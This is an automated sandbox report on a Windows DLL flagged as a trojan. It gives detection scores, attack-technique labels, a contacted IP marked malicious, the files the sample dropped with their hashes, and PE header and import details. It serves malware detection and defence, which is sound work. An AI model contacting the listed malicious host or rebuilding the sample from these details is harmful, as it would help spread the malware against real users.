Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | 1 System Network Configuration Discovery | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
38% | ReversingLabs | Win32.Trojan.Lazy | ||
100% | Joe Sandbox ML |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1245293 | Download File |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe |
⊘No contacted domains info
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| low | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
146.70.35.138 | unknown | United Kingdom | 2018 | TENET-1ZA | true |
IP |
---|
192.168.2.1 |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 614287 |
Start date and time: 23/04/202208:10:43 | 2022-04-23 08:10:43 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 12m 16s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | VoevdOQpeU.dll |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 43 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 1 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.evad.winDLL@29/23@0/2 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
- TCP Packets have been reduced to 100
- Excluded IPs from analysis (whitelisted): 13.107.42.16, 20.189.173.21, 52.168.117.173
- Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, arc.msn.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 6532 because there are no executed function
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
08:11:55 | API Interceptor | |
08:12:10 | API Interceptor | |
08:12:34 | API Interceptor |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_5a7bdef4ffd6df7a7664cf7158b49db77a1e6c9_7cac0383_164b3f26\Report.wer
Download File
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.8484271078729315 |
Encrypted: | false |
SSDEEP: | 96:8xnXzFGeUnYyQy9haot7Jn4pXIQcQac6pcEccw35+a+z+HbHg+AS/YyNlISWbSmH:8RzoneH0tGtjLq/u7sZS274ItW |
MD5: | AC7F4345BC16B046B4BD7A4B49FAD9DE |
SHA1: | 31DB96A77E8C9352345D2D35BDD922C5A989733E |
SHA-256: | 0FE9F258A2E001391DD7FE936ED71F39F02E4A21502048E07AD9AFF57D5D9B8A |
SHA-512: | F029D90D1FE667A52F3ECD173F11501CA11E15159116660080259EA0F562063CD60BA96DEE65A25CC56E7BBCED3D62E93FDE77354CFF4B959ABF6E7EDDC92DC6 |
Malicious: | false |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_5f68951fc85ec886a9cff2e6302d69913a8368e_7cac0383_107353c7\Report.wer
Download File
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.8450263074663521 |
Encrypted: | false |
SSDEEP: | 96:86XqFfeUnYyGy9haTKzfopXIQcQac6FcElcw3d+a+z+HbHg+AS/YyNlISWbSm9mK:8aqFnoHEBPBjLq/u7sZS274ItW |
MD5: | E3453784F5987FFC4297D68B3E5806EC |
SHA1: | 8AE5D7F0D9E1EDD426FD57793895BF06C7D55090 |
SHA-256: | A19FAA5C0A3344576E5CA6B3D224AF727B5260220821BFD197D80F502CC5D9FC |
SHA-512: | FEDF432EFCB2E02D4F617DBEC17EFD457DA47CE6D4AC7040046C4696A1CB7D78E1D2F57F0E7E44C6B2E4ADFDD4B1900F4350B8B0DFCFE51F01448A96D011F5D8 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 39506 |
Entropy (8bit): | 2.072438553320638 |
Encrypted: | false |
SSDEEP: | 192:J54NgWJJkH67dJ+OIKcUcXyK7UbBDaNCQSxtledkyhmWlzwkEFsdw:3LWT7j5IjU4yK7UbBDaMQ6tledkytK |
MD5: | C917F1742DC83F5A043197F2F54A0C4E |
SHA1: | AACA0FC29708705FDBB4F63CC4E9962D0EC5E3EF |
SHA-256: | 142F090B56F1D4E7F37963F99E41AAD407C6F3C1F845BC0915A7EFF81C662889 |
SHA-512: | 61CE862EBD1E02188B5920FA6A57B7269CC4B69FE874AF24C8EB589484EC9B08B540D6E4550CA540686700FAB1A8BC6065D34B9DD7F7DDFF68E5E1E6D68004A6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8340 |
Entropy (8bit): | 3.69846117157985 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNiN/6idq06Y43SUHqgmfJSP+prQ89bgW2TsfkAm:RrlsNiF6W6YoSUKgmfJS2gW24fy |
MD5: | 03FE517493CDA2DA9A9CB5CF3B51E3C8 |
SHA1: | 6DAA111381E6A2BA15D14F385ECD9EE1E680EE70 |
SHA-256: | 088A2319CDDC0633C74897267FED482A3F4602182B6757D5E276C4283FAA5988 |
SHA-512: | 2097EA78A64D0674A3B8CA2D51A0229B07993A46B876B48F168F926A802EDD16BE710F9EFEB5CA1B5468D0F5E26299ED049E44074A9923C903CAD0A66D567DBC |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4598 |
Entropy (8bit): | 4.468439994201981 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zs6JgtWI9PnWgc8sqYjhP8fm8M4J2+EZFI+q849hGpKcQIcQw0kd:uITfIoWgrsqY1UJKErGpKkw0kd |
MD5: | 1F581D2D671323001820EEC345955E8D |
SHA1: | 84D57DE07A1A92920A775FD9A2EF441FD6D55EDC |
SHA-256: | F3C1719825384E2811940641C8F25B5C7C9A8CF7FDFF96C79BD1B7094C66BDC1 |
SHA-512: | E435C1E51CFA9E549F043F8BE4DA0878D52CAA517CC84E732A0800404F08FCC0EE1566E386E3B198C6E254997C8707CD2ED5AF4131285373A55FCFE4191FBF2C |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 36062 |
Entropy (8bit): | 1.9519178024623962 |
Encrypted: | false |
SSDEEP: | 192:b5fZJJkHYyfKOIKcmk2QSxksjVaYHbiJjmJmRsK:9h4VIjmk2Q6ksjYUmX |
MD5: | B26D761700EC27A85A7E8306F7D9C1CD |
SHA1: | 26BA946FC504E3B720545A54C6166E6A2841B1FC |
SHA-256: | A4A981D31AF326622D356EB84A53F327157F52F7EFB02CADB292060F7810FE72 |
SHA-512: | 3205B01478F80D692A1735122340421C8868EF2150ACB96AFFB58777B301034BF223260BF04B93CCDA2F160E29DA10286CD50E4077D174CBEDA5750449E600C3 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8300 |
Entropy (8bit): | 3.69036741286865 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNiNx6ihq06Y4YSUfPgmfRSO+pDn89b3dW2Tsf3lFm:RrlsNiL6q6Y3SU3gmfRSitW24fe |
MD5: | C80DFEB2FD09E96D80A105BF1416186F |
SHA1: | C2E029A858E8ED96BB46CEB163704C526428BB15 |
SHA-256: | B3CE25563BAB4D09351E626D47559203FC2F9E73F43D27AD95C8222BBF41688F |
SHA-512: | 785520C461DF2D2ABFFD907C65A3656B50232434394EA4CE68D02BBC5569D2D3EB307DA67ADCD9C9CE8FD99F9FC0AA888E4456CF642EA1AC3E72D14B7C470FD5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4564 |
Entropy (8bit): | 4.439548228059502 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zs6JgtWI9PnWgc8sqYjhx8fm8M4J2+voFI+q84acupKcQIcQw0kd:uITfIoWgrsqY1WJVBO/pKkw0kd |
MD5: | DF03F167543BFE5B6CDEF17CD6CDB700 |
SHA1: | 6BBC61B7DBF6EB32A530D87A971944CDD312120D |
SHA-256: | 84B755FD6CFD16130CE8987B8BBE160B50DAB6E97F05AB376C74909198264B80 |
SHA-512: | 504C3F517AFEBFE84B4641320FCCB9107C42081F8A6A8672E073F46341DF6CF43569F29E69B8623EC2F86F32A92262FD58EB57FBA10F4F81EACBD4AD6E3E719E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 11606 |
Entropy (8bit): | 4.8910535897909355 |
Encrypted: | false |
SSDEEP: | 192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ |
MD5: | F84F6C99316F038F964F3A6DB900038F |
SHA1: | C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1 |
SHA-256: | F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E |
SHA-512: | E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1328 |
Entropy (8bit): | 3.985489714311352 |
Encrypted: | false |
SSDEEP: | 24:Hre9ERhfpaDfHVhKdNWI+ycuZhNPHqakSGHbPNnq9qd:LSjKd41ulPqa30Rq9K |
MD5: | 67C978F8F6E761129B658BABBAC2C0E3 |
SHA1: | 02E6453D6EA95F5A0EBB0631D927EE771F4B7B0A |
SHA-256: | 9BB6FB8D9FDC155D50F117D1CE410A264593B74F41FEA700ED29099228FA1C4A |
SHA-512: | 78B24238F9F3B4FCF3507F65C29D5F7BA58EBD9866A22239C476D50CDF207B93030B71584F41784CBB2DECB40C888689A5C7BD9953555770ACCCA9954B5A23BD |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1328 |
Entropy (8bit): | 3.965326095070505 |
Encrypted: | false |
SSDEEP: | 24:HJe9EuZfTDQDfHLWhKdNWI+ycuZhNsrakSPEPNnq9qd:ABTqrMKd41ulsra3PEq9K |
MD5: | E34239A621ECB61A5F50016AE522485A |
SHA1: | EDD24063A2BC018FA0F98951A747630C5925D5FE |
SHA-256: | E0F555AAE679A2E77185A2DAD637DAD6F1477AEA45415837C204061570AC891E |
SHA-512: | 5DBA844206EEA3E6E4EC60343E5AA08271F863EC568A169E9EB0904C0D4979CDC5435999ABA05E08CF6AD6DC29078C89CF6C0AC8509D7C3CB4DBEB7D60DECED1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.0806512987018424 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKrak7YnqqPEPN5Dlq5J:+RI+ycuZhNsrakSPEPNnqX |
MD5: | 8C7366A75D058E4560576098B53C2E89 |
SHA1: | 5474E9C863C4BB1B86DA13FEB1DCBAC13BEA6A83 |
SHA-256: | 045887EA02E67AD0120E0D470B59C58099BFDBA859F1F3E31989AE8800BC7765 |
SHA-512: | CDA6B16F3E42B84FB648CD74482E2B7C4B9E2EB463F8D24A96E3893AD7667D9CBC094AE597AF695AD032ADA6CADE89F3E891EC2F6896966882516BBE7DBC3BF1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 417 |
Entropy (8bit): | 5.038440975503667 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJlmMRSRa+eNMjSSRr/++5xVBuSRNA5cWGQRZry:V/DTLDfu09eg5rG+5zBlK5Ny |
MD5: | AE91D1351B9FB773FEF9B6F31D0A22EE |
SHA1: | 323F9FAD2F10ABDC97A7BF643A35DE67E3A32E31 |
SHA-256: | 2CEDA574437717CB5084A6D8315F059002F22D45837C60C003F1F09BB0A72DCD |
SHA-512: | 94C098F8D6FA16950D6CC582D7303D6B1383126C8DB3AA1C85D7E4E155143E2A4E42B3C96A7B5EFAA53CA3AA8A81CDB97B641D1F4521C67456158C32046A8E23 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 369 |
Entropy (8bit): | 5.246210484932597 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fbNOzxs7+AEszIwkn23fbNYA:p37Lvkmb6KRfT4WZEifT1 |
MD5: | 1DFF526FD701241566C75FC5465D31AF |
SHA1: | 5D91CBBE8D1F790F3A38CE35DAB4F705A0BEEF6E |
SHA-256: | ED2CAE80D53441FB70A3307AEB276D80C5D4176F9A9D336B5C87305DC0064ACF |
SHA-512: | E38E5E1D62A47ACAE2F46256453F82352BD5A6AF881D21EB8EC317AB60B4AE452E95E018271A9DD44FA9176799BFE8FB05E5359AF14399820DF6EDAECE85B2D5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6501357671778076 |
Encrypted: | false |
SSDEEP: | 24:etGSzMWWOJy853Ek0s2E7OgDdWQzbtkZfkd2OWI+ycuZhNsrakSPEPNnq:6pvz5UkGE7vxWQzqJkd211ulsra3PEq |
MD5: | 0DB7703243576F0A4B5D43BDB20FD12B |
SHA1: | 67974086EB1D388F41FA3D91AB2BE5C6EE06D2CF |
SHA-256: | 6B514B672F123A4399CAE02C921B046A1FC00D0A01C34B758A7D14F92E1C8BE1 |
SHA-512: | 0962E8886173F666E25787071C9794A4A158FAC0226AE3B19E9E954EC2088268172F1F4AE23671A74BF47E715048082E3E7904B32C5EAF74B0EBBE30A6117A2F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 866 |
Entropy (8bit): | 5.325866700512367 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KRfTJEifTQKaM5DqBVKVrdFAMBJTH:Akka6CTJEuTQKxDcVKdBJj |
MD5: | EE4CA1452DEB397DB57596D3E6012A15 |
SHA1: | E8C4E64E4E2C6AE91EB3B78C460A8D65FB9377EA |
SHA-256: | 102035269C1F6AC6AECEC5D33A268EDB5A33E3BBA56F775441E271EF9C71A7CC |
SHA-512: | EBEB340BC62C181C89B1694C8DBB2D55326A7F19D987686A5A0F7E1B0A59A2824E488CFDD710F2FFABD8683F8038E0FA5163929004F631216B1EA355FD11BE35 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.089404989746942 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry1Hqak7YnqqGHbPN5Dlq5J:+RI+ycuZhNPHqakSGHbPNnqX |
MD5: | 611F888895B72D1096C460FF7EA5E4B7 |
SHA1: | 67CCD8B6129567C2A7CF8B601FD2709FA13D13D0 |
SHA-256: | FFF630440C6AC27F1A70771D2279FE270829A76357941949BA22EB16BD260D6F |
SHA-512: | 0FB11E6584AA80780E1C263285F568A6C77773F35D7A3724692C2B8DD0A0E52D3A8CAA2D4F434F69109650B9243DC474C8EA2BD5C157C8734C297E5584912CA6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 411 |
Entropy (8bit): | 5.082169696837192 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJEPWmMRSR7a1TriuSRa+rVSSRnA/fewoZQy:V/DTLDfu+Pdx9rV5nA/PwQy |
MD5: | 248E15CD19191D4333303E0E1F8E9A70 |
SHA1: | 9896EF9708F81AE4E3F2CA86329AD6BD82C700C3 |
SHA-256: | 0C6C066612882CD36BB425C21983258A23536FFA9E444FE57056C2D95D8B32DF |
SHA-512: | 8975F34DBF35E597A91A3F0F75B6A7D074B68A5D597BC3F1CC797EF2C90E4D6F25F9F132A636DD9CA302A2683D26794E0275C6ED0AC4CC8951B07F65C5642FD1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 369 |
Entropy (8bit): | 5.22267238940763 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23ftUsX0zxs7+AEszIwkn23ftUs2WH:p37Lvkmb6KRf2sEWZEif2sxH |
MD5: | 7261F6CD6A6D4860AC034E27509DC55F |
SHA1: | C1282BE561B76009A43FD5BC192CE9D76AF08272 |
SHA-256: | F7F9574C754A9C5B3A633B90174E4FAC3FBB9D5657E79D07D9CAAF0BAA8FE5EA |
SHA-512: | CBB1190E96E9929BD12DEB50F2916777C8B8845630DE251A733A49567E7DD290F27673B0918D30B4C6691A0142EEF8A4802D6123DC8BECE77E5CA943CD609813 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6369801237092227 |
Encrypted: | false |
SSDEEP: | 24:etGSh8+mUE7R853RY0kCGs+4I4tkZfmPqDZ0WI+ycuZhNPHqakSGHbPNnq:63XE7S505Jm0ZX1ulPqa30Rq |
MD5: | 21F3C262E8990FE0E1A44D58B448B899 |
SHA1: | 2CD298766EC3E59F36C316B35BB0728368117153 |
SHA-256: | D594A1A6D450503AB6BDDC352174CC5F680F84CBEEAC0483BB064BA27CB381F0 |
SHA-512: | 2975E0F079F3D0360854A1249B7A1FBAB7AE5EA851F3A6924302135C03A8DA9E44310CA7E9D82BC672C67755A121B01016B680FE97B060384C3EECF3EE9F9C23 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 866 |
Entropy (8bit): | 5.327904541660146 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KRf2SEif2eOKaM5DqBVKVrdFAMBJTH:Akka6C2SEu2eOKxDcVKdBJj |
MD5: | 51149F7278FBC7AB67B11D6B7BF38CF0 |
SHA1: | 15D9E224C099E0795568A20DAFACEEA4BF50D88A |
SHA-256: | 6477E4EF8AF1EEA40F7734141A2CA95216DCD1BC01C53397ADBEABD2913543CB |
SHA-512: | DCB5699FB0966FF9D79A08AB874CDC2106FD74133878789C469A2EA31970A4B4FBBA138916763DF2C0EAEC64D45120E5A17D1EB5DA7B2D876098DBB4ACED025C |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 6.112861669562404 |
TrID: |
|
File name: | VoevdOQpeU.dll |
File size: | 640699 |
MD5: | ba155d8aed7ca303fcfc3f0248d218e1 |
SHA1: | 600453c21cdbecdbea9c825df4754b8a1829d649 |
SHA256: | a5ea92139f59d185548e8f48d1ce65cbf54bf1e3e1930de221091017fd1d4f0a |
SHA512: | 5b58791e43d9fef57d3233ab015ea0609901ab5d7cc70b6a4d0291ea38e0082af06ba9a8996b6ac822d00f9dc3bf014bb5aabeebd5bf480f92e23372e0850582 |
SSDEEP: | 12288:+w1lEKREbddtOYRbHzcPwka1dCjc3N8ZB:+w1lEKOpuYxiwkkgjAN8ZB |
TLSH: | 12D4BD1A029B2102EBB6CE78A751636C54574CE09B01E2CFC9190DA395E34FBF4FA5ED |
File Content Preview: | MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$........9.(.X.{.X.{.X.{...{0X.{...{.Y.{G.-{.X.{~.({.Y.{..M{.X.{K..z.X.{..r{}Y.{.X.{PX.{K..z.Y.{.!8{.Y.{Rich.X.{....................... |
Icon Hash: | 74f0e4ecccdce0e4 |
Entrypoint: | 0x401023 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x3F4B4692 [Tue Aug 26 11:37:54 2003 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | fd1c62e6f93e304a27347077f6d2b44c |
Signature Valid: | |
Signature Issuer: | |
Signature Validation Error: | |
Error Number: | |
Not Before, Not After | |
Subject Chain | |
Version: | |
Thumbprint MD5: | |
Thumbprint SHA-1: | |
Thumbprint SHA-256: | |
Serial: |
Instruction |
---|
jmp 00007F89EC4AA38Dh |
jmp 00007F89EC4DAAF8h |
jmp 00007F89EC4AA073h |
jmp 00007F89EC4A9D2Eh |
jmp 00007F89EC4AA149h |
jmp 00007F89EC4A9B84h |
jmp 00007F89EC4DFF6Fh |
jmp 00007F89EC4A9C8Ah |
jmp 00007F89EC4D32E5h |
jmp 00007F89EC4E31A0h |
jmp 00007F89EC4DEE0Bh |
jmp 00007F89EC4E4366h |
jmp 00007F89EC4A9C01h |
jmp 00007F89EC4D441Ch |
jmp 00007F89EC4E6A37h |
jmp 00007F89EC4DDCE2h |
jmp 00007F89EC4D549Dh |
jmp 00007F89EC4AA0B8h |
jmp 00007F89EC4E99D3h |
jmp 00007F89EC4A9DDEh |
jmp 00007F89EC4E5599h |
jmp 00007F89EC4DBBC4h |
jmp 00007F89EC4D64AFh |
jmp 00007F89EC4E53BAh |
jmp 00007F89EC4AA055h |
jmp 00007F89EC4E0F90h |
jmp 00007F89EC4D89EBh |
jmp 00007F89EC4E8AF6h |
jmp 00007F89EC4D78B1h |
jmp 00007F89EC4AA04Ch |
jmp 00007F89EC4A9BC7h |
jmp 00007F89EC4E20D2h |
jmp 00007F89EC4E7A4Dh |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x97000 | 0xc8 | .idata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x98000 | 0x703 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1000 | 0x1 | .text |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x99000 | 0x46b8 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x41001 | 0x38 | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9731c | 0x254 | .idata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x3f170 | 0x40000 | False | 0.371898651123 | data | 4.44682748237 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0x41000 | 0x4001b | 0x41000 | False | 0.805322265625 | data | 7.15716511851 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x82000 | 0x14957 | 0x12000 | False | 0.179578993056 | data | 5.40188601701 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.idata | 0x97000 | 0xadd | 0x1000 | False | 0.217041015625 | data | 2.64887682924 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x98000 | 0x703 | 0x1000 | False | 0.1220703125 | data | 1.10395588442 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x99000 | 0x53a5 | 0x6000 | False | 0.152099609375 | data | 5.13419580461 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_VERSION | 0x98170 | 0x3d0 | data |
DLL | Import |
---|---|
WINSPOOL.DRV | GetPrinterDriverDirectoryA, GetPrinterDataExW, DeletePrinterConnectionW, FindFirstPrinterChangeNotification, FindClosePrinterChangeNotification |
msvcrt.dll | toupper |
USER32.dll | DestroyIcon, GetWindowTextA, DrawFrameControl, LoadAcceleratorsA, GetTitleBarInfo, GetMessageExtraInfo, DrawTextW |
OLEAUT32.dll | LHashValOfNameSysA |
SHELL32.dll | FindExecutableW |
